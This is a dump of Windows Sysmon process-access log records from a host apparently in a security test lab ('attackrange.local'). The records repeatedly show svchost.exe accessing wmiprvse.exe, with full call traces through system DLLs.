12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
